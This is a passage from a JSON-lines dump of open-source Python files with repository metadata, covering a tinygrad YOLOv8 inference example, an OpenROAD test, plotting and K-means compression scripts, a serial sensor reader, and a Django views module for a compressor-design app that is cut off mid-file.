self.cv1 = Conv_Block(c1, c_, kernel_size=kernels[0], stride=1, padding=None)\n self.cv2 = Conv_Block(c_, c2, kernel_size=kernels[1], stride=1, padding=None, groups=g)\n self.residual = c1 == c2 and shortcut\n\n def __call__(self, x):\n return x + self.cv2(self.cv1(x)) if self.residual else self.cv2(self.cv1(x))\n\nclass C2f:\n def __init__(self, c1, c2, n=1, shortcut=False, g=1, e=0.5):\n self.c = int(c2 * e)\n self.cv1 = Conv_Block(c1, 2 * self.c, 1,)\n self.cv2 = Conv_Block((2 + n) * self.c, c2, 1)\n self.bottleneck = [Bottleneck(self.c, self.c, shortcut, g, kernels=[(3, 3), (3, 3)], channel_factor=1.0) for _ in range(n)]\n\n def __call__(self, x):\n y= list(self.cv1(x).chunk(2, 1))\n y.extend(m(y[-1]) for m in self.bottleneck)\n z = y[0]\n for i in y[1:]: z = z.cat(i, dim=1)\n return self.cv2(z)\n\nclass SPPF:\n def __init__(self, c1, c2, k=5):\n c_ = c1 // 2 # hidden channels\n self.cv1 = Conv_Block(c1, c_, 1, 1, padding=None)\n self.cv2 = Conv_Block(c_ * 4, c2, 1, 1, padding=None)\n\n # TODO: this pads with 0s, whereas torch function pads with -infinity. This results in a < 2% difference in prediction which does not make a difference visually.\n self.maxpool = lambda x : x.pad2d((k // 2, k // 2, k // 2, k // 2)).max_pool2d(kernel_size=k, stride=1)\n\n def __call__(self, x):\n x = self.cv1(x)\n x2 = self.maxpool(x)\n x3 = self.maxpool(x2)\n x4 = self.maxpool(x3)\n return self.cv2(x.cat(x2, x3, x4, dim=1))\n\nclass DFL:\n def __init__(self, c1=16):\n self.conv = Conv2d(c1, 1, 1, bias=False)\n x = Tensor.arange(c1)\n self.conv.weight.assign(x.reshape(1, c1, 1, 1))\n self.c1 = c1\n\n def __call__(self, x):\n b, c, a = x.shape # batch, channels, anchors\n return self.conv(x.reshape(b, 4, self.c1, a).transpose(2, 1).softmax(1)).reshape(b, 4, a)\n\n#backbone\nclass Darknet:\n def __init__(self, w, r, d):\n self.b1 = [Conv_Block(c1=3, c2= int(64*w), kernel_size=3, stride=2, padding=1), Conv_Block(int(64*w), int(128*w), kernel_size=3, stride=2, padding=1)]\n self.b2 = [C2f(c1=int(128*w), c2=int(128*w), n=round(3*d), shortcut=True), Conv_Block(int(128*w), int(256*w), 3, 2, 1), C2f(int(256*w), int(256*w), round(6*d), True)]\n self.b3 = [Conv_Block(int(256*w), int(512*w), kernel_size=3, stride=2, padding=1), C2f(int(512*w), int(512*w), round(6*d), True)]\n self.b4 = [Conv_Block(int(512*w), int(512*w*r), kernel_size=3, stride=2, padding=1), C2f(int(512*w*r), int(512*w*r), round(3*d), True)]\n self.b5 = [SPPF(int(512*w*r), int(512*w*r), 5)]\n\n def return_modules(self):\n return [*self.b1, *self.b2, *self.b3, *self.b4, *self.b5]\n\n def __call__(self, x):\n x1 = x.sequential(self.b1)\n x2 = x1.sequential(self.b2)\n x3 = x2.sequential(self.b3)\n x4 = x3.sequential(self.b4)\n x5 = x4.sequential(self.b5)\n return (x2, x3, x5)\n\n#yolo fpn (neck)\nclass Yolov8NECK:\n def __init__(self, w, r, d): #width_multiple, ratio_multiple, depth_multiple\n self.up = Upsample(2, mode='nearest')\n self.n1 = C2f(c1=int(512*w*(1+r)), c2=int(512*w), n=round(3*d), shortcut=False)\n self.n2 = C2f(c1=int(768*w), c2=int(256*w), n=round(3*d), shortcut=False)\n self.n3 = Conv_Block(c1=int(256*w), c2=int(256*w), kernel_size=3, stride=2, padding=1)\n self.n4 = C2f(c1=int(768*w), c2=int(512*w), n=round(3*d), shortcut=False)\n self.n5 = Conv_Block(c1=int(512* w), c2=int(512 * w), kernel_size=3, stride=2, padding=1)\n self.n6 = C2f(c1=int(512*w*(1+r)), c2=int(512*w*r), n=round(3*d), shortcut=False)\n\n def return_modules(self):\n return [self.n1, self.n2, self.n3, self.n4, self.n5, self.n6]\n\n def __call__(self, p3, p4, p5):\n x = self.n1(self.up(p5).cat(p4, dim=1))\n head_1 = self.n2(self.up(x).cat(p3, dim=1))\n head_2 = self.n4(self.n3(head_1).cat(x, dim=1))\n head_3 = self.n6(self.n5(head_2).cat(p5, dim=1))\n return [head_1, head_2, head_3]\n\n#task specific head.\nclass DetectionHead:\n def __init__(self, nc=80, filters=()):\n self.ch = 16\n self.nc = nc # number of classes\n self.nl = len(filters)\n self.no = nc + self.ch * 4 #\n self.stride = [8, 16, 32]\n c1 = max(filters[0], self.nc)\n c2 = max((filters[0] // 4, self.ch * 4))\n self.dfl = DFL(self.ch)\n self.cv3 = [[Conv_Block(x, c1, 3), Conv_Block(c1, c1, 3), Conv2d(c1, self.nc, 1)] for x in filters]\n self.cv2 = [[Conv_Block(x, c2, 3), Conv_Block(c2, c2, 3), Conv2d(c2, 4 * self.ch, 1)] for x in filters]\n\n def __call__(self, x):\n for i in range(self.nl):\n x[i] = (x[i].sequential(self.cv2[i]).cat(x[i].sequential(self.cv3[i]), dim=1))\n self.anchors, self.strides = (x.transpose(0, 1) for x in make_anchors(x, self.stride, 0.5))\n y = [(i.reshape(x[0].shape[0], self.no, -1)) for i in x]\n x_cat = y[0].cat(y[1], y[2], dim=2)\n box, cls = x_cat[:, :self.ch * 4], x_cat[:, self.ch * 4:]\n dbox = dist2bbox(self.dfl(box), self.anchors.unsqueeze(0), xywh=True, dim=1) * self.strides\n z = dbox.cat(cls.sigmoid(), dim=1)\n return z\n\nclass YOLOv8:\n def __init__(self, w, r, d, num_classes): #width_multiple, ratio_multiple, depth_multiple\n self.net = Darknet(w, r, d)\n self.fpn = Yolov8NECK(w, r, d)\n self.head = DetectionHead(num_classes, filters=(int(256*w), int(512*w), int(512*w*r)))\n\n def __call__(self, x):\n x = self.net(x)\n x = self.fpn(*x)\n return self.head(x)\n\n def return_all_trainable_modules(self):\n backbone_modules = [*range(10)]\n yolov8neck_modules = [12, 15, 16, 18, 19, 21]\n yolov8_head_weights = [(22, self.head)]\n return [*zip(backbone_modules, self.net.return_modules()), *zip(yolov8neck_modules, self.fpn.return_modules()), *yolov8_head_weights]\n\nif __name__ == '__main__':\n\n # usage : python3 yolov8.py \"image_URL OR image_path\" \"v8 variant\" (optional, n is default)\n if len(sys.argv) < 2:\n print(\"Error: Image URL or path not provided.\")\n sys.exit(1)\n\n img_path = sys.argv[1]\n yolo_variant = sys.argv[2] if len(sys.argv) >= 3 else (print(\"No variant given, so choosing 'n' as the default. Yolov8 has different variants, you can choose from ['n', 's', 'm', 'l', 'x']\") or 'n')\n print(f'running inference for YOLO version {yolo_variant}')\n\n output_folder_path = Path('./outputs_yolov8')\n output_folder_path.mkdir(parents=True, exist_ok=True)\n #absolute image path or URL\n image_location = [np.frombuffer(fetch(img_path).read_bytes(), np.uint8)]\n image = [cv2.imdecode(image_location[0], 1)]\n out_paths = [(output_folder_path / f\"{Path(img_path).stem}_output{Path(img_path).suffix}\").as_posix()]\n if not isinstance(image[0], np.ndarray):\n print('Error in image loading. Check your image file.')\n sys.exit(1)\n pre_processed_image = preprocess(image)\n\n # Different YOLOv8 variants use different w , r, and d multiples. For a list , refer to this yaml file (the scales section) https://github.com/ultralytics/ultralytics/blob/main/ultralytics/models/v8/yolov8.yaml\n depth, width, ratio = get_variant_multiples(yolo_variant)\n yolo_infer = YOLOv8(w=width, r=ratio, d=depth, num_classes=80)\n\n state_dict = safe_load(fetch(f'https://gitlab.com/r3sist/yolov8_weights/-/raw/master/yolov8{yolo_variant}.safetensors'))\n load_state_dict(yolo_infer, state_dict)\n\n st = time.time()\n predictions = yolo_infer(pre_processed_image)\n print(f'did inference in {int(round(((time.time() - st) * 1000)))}ms')\n\n post_predictions = postprocess(preds=predictions, img=pre_processed_image, orig_imgs=image)\n\n #v8 and v3 have same 80 class names for Object Detection\n class_labels = fetch('https://raw.githubusercontent.com/pjreddie/darknet/master/data/coco.names').read_text().split(\"\\n\")\n\n draw_bounding_boxes_and_save(orig_img_paths=image_location, output_img_paths=out_paths, all_predictions=post_predictions, class_labels=class_labels)\n\n# TODO for later:\n# 1. Fix SPPF minor difference due to maxpool\n# 2. AST exp overflow warning while on cpu\n# 3. Make NMS faster\n# 4. Add video inference and webcam support","repo_name":"tinygrad/tinygrad","sub_path":"examples/yolov8.py","file_name":"yolov8.py","file_ext":"py","file_size_in_byte":19265,"program_lang":"python","lang":"en","doc_type":"code","stars":20676,"dataset":"github-code","pt":"61"} +{"seq_id":"18045108007","text":"from openroad import Design, Tech\nimport helpers\nimport rcx_aux\n\ntech = Tech()\ntech.readLef(\"sky130hs/sky130hs.tlef\")\ndesign = Design(tech)\n\nrcx_aux.bench_wires(len=100, all=True)\n\ndef_file = helpers.make_result_file(\"generate_pattern.def\")\n\nverilog_file = helpers.make_result_file(\"generate_pattern.v\")\n\nrcx_aux.bench_verilog(filename=verilog_file)\n\ndesign.writeDef(def_file)\n\nhelpers.diff_files(\"generate_pattern.defok\", def_file)\nhelpers.diff_files(\"generate_pattern.vok\", verilog_file)\n","repo_name":"The-OpenROAD-Project/OpenROAD","sub_path":"src/rcx/test/generate_pattern.py","file_name":"generate_pattern.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":1027,"dataset":"github-code","pt":"61"} +{"seq_id":"2910990412","text":"import plotly.io as pio\n\nimport hydra\nfrom omegaconf import OmegaConf\n\nimport logging\nimport os\nimport sys\nimport glob\n# from natsort import natsorted\nimport numpy as np\nimport torch\nfrom collections import defaultdict\n\n# add cwd to path to allow running directly from the repo top level directory\nsys.path.append(os.getcwd())\nlog = logging.getLogger(__name__)\n\nfrom learn.utils.plotly import generate_errorbar_traces, plot_rewards_over_trials, hv_characterization, plot_sweep_1, plot_rollout_dat\n\n\n######################################################################\n@hydra.main(config_path='conf/plotting.yaml')\ndef plot(cfg):\n log.info(\"============= Configuration =============\")\n log.info(f\"Config:\\n{cfg.pretty()}\")\n log.info(\"=========================================\")\n hv_characterization()\n quit()\n # Yaw control\n yaw_dir = \"/Users/nato/Documents/Berkeley/Research/Codebases/dynamics-learn/sweeps/2020-05-13/08-01-09/metric.name=Yaw,robot=iono_sim/\"\n ex = \"0/trial_33.dat\"\n yaw_ex = yaw_dir+ex\n # plot_sweep_1(yaw_dir)\n plot_rollout_dat(yaw_ex)\n quit()\n # dir=2020-02-10/15-39-36\n files = glob.glob(hydra.utils.get_original_cwd() + '/outputs/' + cfg.dir + '/*/**.dat')\n ms = []\n cl = []\n for g in files:\n mse, clust = torch.load(g)\n if clust < 500:\n continue\n ms.append(mse)\n cl.append(clust)\n\n # ms = np.array(ms)\n # cl = np.array(cl)\n\n # Non clustered data\n full_size = [4000]\n base = [0.6844194601919266,\n 0.6426670856359498,\n 0.6760970001662061,\n 0.7867345088097977,\n 0.6402819700817463,\n 0.6432612884414582,\n 0.614643476721318,\n 0.673518857099874,\n 0.5565854257191823,\n 0.9437187183401807]\n #\n # for b in base:\n # ms.append(b)\n # cl.append(full_size[0])\n\n cl, ms = zip(*sorted(zip(cl, ms)))\n ids = np.unique(cl)\n\n cl_arr = np.stack(cl).reshape((len(ids), -1))\n ms_arr = np.stack(ms).reshape((len(ids), -1))\n\n import matplotlib.pyplot as plt\n import plotly.graph_objects as go\n\n colors = plt.get_cmap('tab10').colors\n traces = []\n i = 1\n cs_str = 'rgb' + str(colors[i])\n\n err_traces, xs, ys = generate_errorbar_traces(ms_arr.T, xs=cl_arr.T.tolist(), color=cs_str,\n name=f\"Clustered Training\")\n for t in err_traces:\n traces.append(t)\n\n layout = dict( #title=f\"Test Set Prediction Error\", # (Env: {env_name})\",\n xaxis={'title': 'Cluster Size (Log Scale)',\n 'autorange': 'reversed',\n 'range':[3.7, 2.6]\n },\n yaxis={'title': 'Prediction Mean Squared Error',\n 'range':[.3,1]},\n font=dict(family='Times New Roman', size=33, color='#7f7f7f'),\n xaxis_type=\"log\",\n # yaxis_type=\"log\",\n height=600,\n width=1300,\n margin=dict(l=0, r=0, b=0, t=0),\n plot_bgcolor='white',\n legend={'x': .6, 'y': .05, 'bgcolor': 'rgba(50, 50, 50, .03)'})\n\n\n fig = go.Figure(\n data=traces,\n layout=layout,\n )\n\n fig.add_trace(\n # Line Horizontal\n go.Scatter(\n mode=\"lines\",\n x=[max(ids), min(ids)],\n y=[np.mean(base), np.mean(base)],\n line=dict(\n color=\"gray\",\n width=4,\n dash=\"dashdot\",\n ),\n name='Default Training (4000 Datapoints)'\n ))\n\n import plotly.io as pio\n pio.show(fig)\n fig.write_image('clustering_thin.pdf')\n quit()\n hv_characterization()\n\n ######################################################################\n logs = defaultdict(list)\n configs = defaultdict(list)\n logs_dirs = ['/Users/nol/Documents/code-bases/dynamicslearn/multirun/2019-12-16/20-01-04/', ]\n\n def load_log(directory, trial_file=None):\n if '.hydra' in os.listdir(directory):\n full_conf = OmegaConf.load(f\"{directory}/.hydra/config.yaml\")\n else:\n full_conf = OmegaConf.load(f\"{directory}/config.yaml\")\n trial_files = glob.glob(f\"{directory}/trial_*.dat\")\n if len(trial_files) > 1:\n if trial_file is not None:\n last_trial_log = f\"{directory}/{trial_file}\"\n else:\n last_trial_log = max(trial_files, key=os.path.getctime)\n vis_log = torch.load(last_trial_log)\n logs[log_dir].append(vis_log)\n configs[log_dir].append(full_conf)\n\n for log_dir in logs_dirs:\n if os.path.exists(os.path.join(log_dir, 'config.yaml')):\n log.info(f\"Loading latest trial from {log_dir}\")\n d = os.path.join(log_dir)\n load_log(d)\n else:\n # Assuming directory with multiple identical experiments (dir/0, dir/1 ..)\n latest = defaultdict(list)\n for ld in os.listdir(log_dir):\n directory = os.path.join(log_dir, ld)\n if os.path.isdir(directory):\n trial_files = glob.glob(f\"{directory}/trial_*.dat\")\n if len(trial_files) == 0:\n continue\n last_trial_log = max(trial_files, key=os.path.getctime)\n last_trial_log = last_trial_log[len(directory) + 1:]\n latest[log_dir].append(last_trial_log)\n\n for ld in os.listdir(log_dir):\n if ld == '.slurm': continue\n log_subdir = os.path.join(log_dir, ld)\n if os.path.isdir(log_subdir):\n # Load data for the smallest trial number from all sub directories\n if len(latest[log_dir]) == 0:\n log.warn(f\"No trial files found under {log_dir}\")\n break\n trial_file = natsorted(latest[log_dir])[0]\n load_log(log_subdir, trial_file)\n\n # To display the figure defined by this dict, use the low-level plotly.io.show function\n plot_rewards_over_trials(logs)\n\n\nif __name__ == '__main__':\n sys.exit(plot())\n","repo_name":"natolambert/dynamicslearn","sub_path":"learn/plot_plotly.py","file_name":"plot_plotly.py","file_ext":"py","file_size_in_byte":6278,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"61"} +{"seq_id":"30097765931","text":"import numpy as np\nimport scipy\nfrom serial import *\nfrom io import RawIOBase\n\nfrom serial import tools\nfrom serial.tools import list_ports\nfrom serial.tools.list_ports_common import ListPortInfo\nfrom serial import serialwin32 as serial\n\nser = tools.list_ports.comports();\n\n# serbase = serial.serialutil.SerialBase('COM8')\nser = serial.Serial('COM8')\n# ser.open()\n\ncal = [62.0,59.67,57.5,59.33,54.67,56.67,54.33,61.0,64.67,60.33,56.67,53.0,55.67,51.0,62.0,56.33,60.33,61.67,66.0,56.67,55.0,55.33,62.67,60.33,61.67,61.0,57.67,62.67,55.67,60.0,64.0,63.33,59.33,63.0,62.67,61.0,56.0,54.5,59.67,70.0]\n\ndef read_line():\n\tline = ''\n\twhile(ser.in_waiting > 0):\n\t\tresp = ser.read()\n\t\tline += resp.decode()\n\treturn line\n\ndef calibrate(line, cal):\n\tline_list = line.split(\",\")[0:-1]\n\tline_list = np.array([float(i) for i in line_list])\n\n\tfor i in range(len(line_list)):\n\t\tline_list[i] = line_list[i] - cal[i]\n\t\tif line_list[i] < 0:\n\t\t\tline_list[i] = 0\n\n\tline_list = np.array([str(i) for i in line_list])\n\tcomma = ','\n\tp_line = comma.join(line_list)\n\treturn p_line\n\ndef process_line(line, cal):\n\tline = calibrate(line, cal)\n\tline_list = line.split(\",\")[0:-1]\n\tline_list = np.array([float(i) for i in line_list])\n\tline_list = avg_filt(line_list)\n\tthresh = np.mean(line_list);\n\t\n\tline_list = line_list>thresh\n\tline_list = line_list.astype(np.int)\n\n\tline_list = np.array([str(i) for i in line_list])\n\tcomma = ''\n\tp_line = comma.join(line_list)\n\tp_line += '\\n\\r'\n\treturn p_line\n\ndef avg_filt(x):\n\tavg = x[0:len(x)-2] + x[1:len(x)-1] + x[2:len(x)]\n\tavg_com = [x[0]] + avg.tolist() + [x[-1]]\n\treturn avg_com\n\nf = open(\"./image.txt\", \"w+\")\nf.close()\n\nwhile(1):\n\tif (ser.in_waiting > 0):\n\t\tline = read_line()\n\t\tp_line = process_line(line, cal)\n\t\tprint(p_line)\n\t\tf = open(\"./image.txt\", \"a+\")\n\t\tf.write(p_line)\n\t\tf.close()\n\n","repo_name":"mchoun95/6.s063_Scanner","sub_path":"contact_image_sensor/Wifi/Serial.py","file_name":"Serial.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36090222564","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n# Open PNG file\r\nfrom PIL import Image\r\n# Load matlab's file\r\nimport scipy.io\r\n\r\nfrom initializeCentroids import initialize_centroids\r\nfrom KmeansAlgo import kmeans_algo\r\nfrom findClosestCentroids import find_closest_centroid\r\n\r\n\r\n# Purpose: we'll use K-means algo to select 16 colors that will be used to represent the compressed image.\r\n# Concretely, we treat every pixel of original image as a data example AND use K-means algo to find 16 colors that are\r\n# the most appropriate cluster (group) of pixel in 3D RGB space. Once we have computed the trained cluster centroids\r\n# on the image, we use these 16 colors to replace colors in image (Means compress image to only 16 colors)\r\n\r\n# Load image & show PNG image\r\nfname = \"data/bird_small.png\"\r\nplt.imshow(Image.open(fname))\r\nplt.axis(\"off\")\r\nplt.show()\r\n\r\n# Load image array file of \"bird_small.png\"\r\nbird_mat = scipy.io.loadmat(\"data/bird_small.mat\")\r\nA = bird_mat[\"A\"]\r\n\r\n# Scaling and Reducing dimension to 2D array\r\nA = np.divide(A, 255) # Result between 0-1\r\nA = np.reshape(A, (A.shape[0]*A.shape[1], A.shape[2]))\r\ninput(\"Pause program, Press enter to continue\")\r\n\r\n\r\n############# Run K-mean to compress colors of image to 16 colors #############\r\nprint(\"Run K-means clustering algo with K = 16 \")\r\n# Set Initial parameters\r\nK = 16\r\nmax_iter = 10\r\ninitial_centroids = initialize_centroids(A, K)\r\n\r\n# Fitting Data to K-means model -> trained centroids\r\ncentroids, _ = kmeans_algo(A, initial_centroids, max_iter, False) # (K, A.shape[1])\r\n\r\n# Apply K-mean model to compress image\r\n# \"idx\": index of each color closet to each data example\r\nidx = find_closest_centroid(A, centroids)\r\nidx = idx.astype(int) # (A.shape[0], 1)\r\n\r\n# Recover image with only 16 colors\r\nA_recover = np.zeros((A.shape[0], A.shape[1]))\r\n# Apply closest color to each data example\r\nfor k in range(A_recover.shape[0]):\r\n A_recover[k, :] = centroids[idx[k]-1, :]\r\n# Reshape recover array to an image array (3D arr)\r\nA_recovered = A_recover.reshape((bird_mat[\"A\"].shape[0], bird_mat[\"A\"].shape[1], bird_mat[\"A\"].shape[2]))\r\n\r\n# Plotting original image and recovered image for comparing\r\nplt.subplot(2, 1, 1)\r\nplt.axis(\"off\")\r\nplt.title(\"Original\")\r\nplt.imshow(Image.open(fname))\r\n\r\nplt.subplot(2, 1, 2)\r\nplt.title(\"Recover\")\r\nplt.axis(\"off\")\r\nplt.imshow(A_recovered)\r\nplt.show()\r\ninput(\"Pause program, Press enter to continue\")\r\n\r\n\r\n############## K-means with multiple value of K ###############\r\nprint(\"\\nRun K-means clustering algorithm with multiple value of K\")\r\n# Data input \"A\" is already pre-precessed above\r\nK_vals = [2, 8, 16, 24, 32]\r\nmax_iter = 10\r\n\r\n# Run K-means algo to different value of K\r\nimg_compressed = []\r\nfor iK, K in enumerate(K_vals):\r\n print(f\"\\nRun K-mean algo with K = {K}\")\r\n\r\n # Run K-means algo\r\n initial_centroids = initialize_centroids(A, K)\r\n centroids, _ = kmeans_algo(A, initial_centroids, max_iter, False)\r\n # Image compression\r\n idx = find_closest_centroid(A, centroids)\r\n idx = idx.astype(int)\r\n # Recover the image with K colors\r\n A_recover = np.zeros((A.shape[0], A.shape[1]))\r\n for k in range(A_recover.shape[0]):\r\n A_recover[k, :] = centroids[idx[k]-1, :]\r\n A_recovered = A_recover.reshape((bird_mat[\"A\"].shape[0], bird_mat[\"A\"].shape[1], bird_mat[\"A\"].shape[2]))\r\n # Add recovered image to list\r\n img_compressed.append(A_recovered)\r\n\r\ninput(\"Pause program, Press enter to continue\")\r\n\r\n\r\n# Multiple plot for different recovered images\r\nfig = plt.figure(figsize=(7, 9))\r\nnrows = 3\r\nncols = 2\r\nax = fig.add_subplot(nrows, ncols, 1)\r\nax.axis(\"off\")\r\nax.set_title(\"Original\")\r\nax.imshow(bird_mat[\"A\"])\r\n\r\nfor i in range(len(img_compressed)):\r\n ax = fig.add_subplot(nrows, ncols, i+2)\r\n ax.imshow(img_compressed[i])\r\n ax.axis(\"off\")\r\n ax.set_title(f\"K = {K_vals[i]}\")\r\nplt.show()\r\n\r\n","repo_name":"HarryPham0123/Coursera_Machine_learning_AndrewNg","sub_path":"(Ex7)_Unsupervised_learning_AND_PCA_algorithm/main_ImageCompressWithKmeans.py","file_name":"main_ImageCompressWithKmeans.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"73373150275","text":"import asyncio\nfrom typing import List\n\n\nasync def produce_work(\n batch: List[dict],\n work_queue: asyncio.Queue,\n producer_completed: asyncio.Event):\n for data in batch:\n await work_queue.put(data)\n producer_completed.set()\n","repo_name":"FShamasneh/advanced_python","sub_path":"async/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13552267322","text":"from django.shortcuts import render, redirect\nfrom django.template.loader import render_to_string\nimport django.template\nfrom . import forms\nfrom . import models\nimport django.http\nimport django.views.generic\nimport django.utils.timezone\nimport django.db.utils\nimport django.db\nfrom django.core.urlresolvers import reverse\nfrom .data_extraction import DebugCompressorHandler\nfrom django.views.decorators.cache import never_cache\nimport time\nfrom django.contrib import auth\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.auth.decorators import login_required\nimport django.core.exceptions\nimport json\nimport ast\nfrom enum import Enum\nimport re\nfrom . import compressor_engine_handle\nimport logging\nfrom .compressor_engine import engine_logging\nimport traceback\nimport pdb\n\n\nclass FORM_CLASS(Enum):\n main = forms.MainParametersForm\n mean_radius = forms.MeanRadiusParametersForm\n profiling = forms.ProfilingParametersForm\n\n\nclass MODEL_CLASS(Enum):\n main = models.MainDataPart\n mean_radius = models.MeanRadiusDataPart\n profiling = models.ProfilingDataPart\n\n\nclass AuthMixin:\n def get_response(self, request):\n if request.user.is_authenticated():\n return self.render_registered_template(request)\n else:\n return self.render_unregister_template(request)\n\n def render_registered_template(self, request):\n pass\n\n def render_unregister_template(self, request):\n pass\n\n\nclass GetMainPage(django.views.generic.TemplateView):\n template_name = 'gas_dynamics/main_page.html'\n\n\nclass Login(django.views.generic.View):\n\n def get(self, request):\n if 'auth_fail' in request.session:\n auth_fail = True\n else:\n auth_fail = False\n context = {\n 'auth_fail': auth_fail,\n }\n\n return render(request, 'gas_dynamics/login.html', context)\n\n def post(self, request):\n username = request.POST['username']\n password = request.POST['password']\n\n print(username, password)\n\n user = auth.authenticate(username=username, password=password)\n\n if user is not None:\n if user.is_active:\n auth.login(request, user)\n return redirect('gas_dynamics:main_page')\n else:\n pass\n else:\n request.session['auth_fail'] = True\n return redirect('gas_dynamics:login')\n\n\nclass Logout(django.views.generic.View):\n def get(self, request):\n auth.logout(request)\n return redirect('gas_dynamics:main_page')\n\n\nclass ProjectList(django.views.generic.ListView):\n model = models.Project\n context_object_name = 'projects'\n template_name = 'gas_dynamics/project_list/projects_list.html'\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n return super(ProjectList, self).dispatch(request, *args, **kwargs)\n\n def get_query_set(self):\n return models.Project.objects.all()\n\n\nclass DeleteProject(django.views.generic.View):\n model = models.Project\n\n def post(self, request, username, project_name):\n if request.is_ajax():\n project_name = request.POST['project_name']\n projects = self.model.objects.filter(name=project_name)\n\n for project in projects:\n project.delete()\n\n context = {\n 'projects': models.Project.objects.all(),\n }\n return render(request, 'gas_dynamics/project_list/projects_body.html', context)\n else:\n raise django.http.BadHeaderError('This the AJAX only url')\n\n\nclass AddProject(django.views.generic.View):\n model = models.Project\n\n def post(self, request, username):\n if request.is_ajax():\n project_form = forms.AddProjectForm(request.POST)\n\n error_message = ''\n if project_form.is_valid():\n try:\n project = self.model.objects.create(user=request.user, name=project_form.cleaned_data['name'])\n project.save()\n except django.db.IntegrityError as e:\n error_message += 'This project already exists.\\n'\n else:\n error_message += 'Invalid project name.\\n'\n\n context = {\n 'projects': models.Project.objects.all(),\n }\n\n request_context = django.template.RequestContext(request)\n html_content = render_to_string('gas_dynamics/project_list/projects_body.html', context, request_context)\n\n return django.http.JsonResponse({\n 'html_content': html_content,\n 'errors': error_message\n })\n else:\n raise django.http.BadHeaderError('This the AJAX only url')\n\n\nclass ProjectTasks(django.views.generic.View):\n template_name = 'gas_dynamics/project_content/task_container_template.html'\n\n def get(self, request, username, project_name):\n project = models.Project.objects.get(name=project_name)\n tasks = models.Task.objects.filter(project=project)\n\n print('Here', models.Task.objects.all(), '\\n\\n\\n')\n\n context = {\n 'project': project,\n 'tasks': tasks\n }\n\n return render(request, self.template_name, context=context)\n\n\nclass AddTask(django.views.generic.View):\n model = models.Project\n\n def post(self, request, username, project_name):\n if request.is_ajax():\n task_form = forms.AddTaskForm(request.POST)\n\n error_message = ''\n if task_form.is_valid():\n user = request.user\n project = models.Project.objects.get(user=user, name=project_name)\n task_name = task_form.cleaned_data['name']\n\n try:\n self._create_task(project, task_name)\n except django.db.IntegrityError as e:\n error_message += str(e)\n else:\n error_message += 'Invalid task name.\\n'\n\n if not error_message:\n context = {\n 'tasks': models.Task.objects.filter(project=project),\n 'project': project\n }\n else:\n context = {}\n\n request_context = django.template.RequestContext(request)\n html_content = render_to_string('gas_dynamics/project_content/task_container.html', context, request_context)\n\n return django.http.JsonResponse({\n 'html_content': html_content,\n 'errors': error_message\n })\n else:\n raise django.http.BadHeaderError('This the AJAX only url')\n\n def _create_task(self, project, task_name):\n task = models.Task.objects.create(project=project, name=task_name)\n task.save()\n\n\nclass UpdateTask(django.views.generic.View):\n def post(self, request, username, project_name, task_name):\n if request.is_ajax():\n user = models.User.objects.get(username=username)\n project = models.Project.objects.get(user=user, name=project_name)\n task = models.Task.objects.get(project=project, name=task_name)\n task_dict = json.loads(request.POST['data'])\n\n self._reset_task_kind(task)\n process_results = dict()\n for form_type in task_dict:\n data = {\n 'user': user,\n 'project': project,\n 'task': task,\n 'content': json.loads(task_dict[form_type])\n }\n\n process_results[form_type] = self._process_wrapper(request, task, data, form_type)\n\n return django.http.JsonResponse(process_results)\n else:\n raise django.http.BadHeaderError('This the AJAX only url')\n\n def _process_wrapper(self, request, task, data, form_type):\n form_class = FORM_CLASS[form_type].value\n model_class = MODEL_CLASS[form_type].value\n return self._process_form_data(request, task, data, form_class, model_class)\n\n def _process_form_data(self, request, task, data, form_class, model_class):\n form = form_class(data['content'])\n result = dict()\n\n if form.is_valid():\n model, is_created = model_class.objects.get_or_create(task=data['task'], defaults=form.cleaned_data)\n\n for key in form.cleaned_data:\n setattr(model, key, form.cleaned_data[key])\n\n model.save()\n self._set_task_kind(task, model.get_task_kind())\n\n result['messages'] = 'Data block saved'\n result['errors'] = ''\n else:\n result['messages'] = 'Data block not saved'\n result['errors'] = form.errors\n\n return result\n\n @classmethod\n def _set_task_kind(cls, task, new_kind):\n priority = {\n models.Task.TASK_KIND.multi: 10,\n models.Task.TASK_KIND.single: 0,\n models.Task.TASK_KIND.unset: -10,\n }\n\n if priority[new_kind] > priority[task.kind]:\n task.kind = new_kind\n task.save()\n\n @classmethod\n def _reset_task_kind(cls, task):\n task.kind = models.Task.TASK_KIND.unset\n task.save()\n\n\n\n\nclass SolveTask(django.views.generic.View):\n def post(self, request, username, project_name, task_name):\n if request.is_ajax():\n user = models.User.objects.get(username=username)\n project = models.Project.objects.get(user=user, name=project_name)\n task = models.Task.objects.get(project=project, name=task_name)\n calc_type = request.POST['calc_type']\n\n try:\n solver = compressor_engine_handle.CompressorSolver(task)\n result_msg = self._calculate(solver, calc_type)\n except compressor_engine_handle.OperationFailedError as e:\n return django.http.HttpResponse('Task was not solved. %s' % (str(e),))\n\n\n return django.http.HttpResponse(result_msg)\n else:\n raise django.http.BadHeaderError('This the AJAX only url')\n\n @classmethod\n def _get_solver_funcs(cls, key):\n def get_func_pair(call_func, analyzer):\n return (call_func, analyzer)\n\n if key == 'mean_radius':\n def call_func(solver):\n return solver.calculate_mean_radius()\n\n def analyzer(result):\n if result:\n return 'Mean radius calculation successfully finished'\n else:\n return 'Mean radius calculation failed'\n\n return get_func_pair(call_func, analyzer)\n\n elif key == 'profiling':\n\n def call_func(solver):\n return solver.do_profiling()\n\n def analyzer(result):\n if result:\n return 'Profiling successfully finished'\n else:\n return 'Profiling failed'\n\n return get_func_pair(call_func, analyzer)\n\n elif key == 'both':\n\n def call_func(solver):\n return [method() for method in (solver.calculate_mean_radius, solver.do_profiling)]\n\n def analyzer(result):\n if result[0] and result[1]:\n return 'Both successfully finished'\n elif result[0] and not result[1]:\n return 'Mean radius calculation successfully finished. Profiling 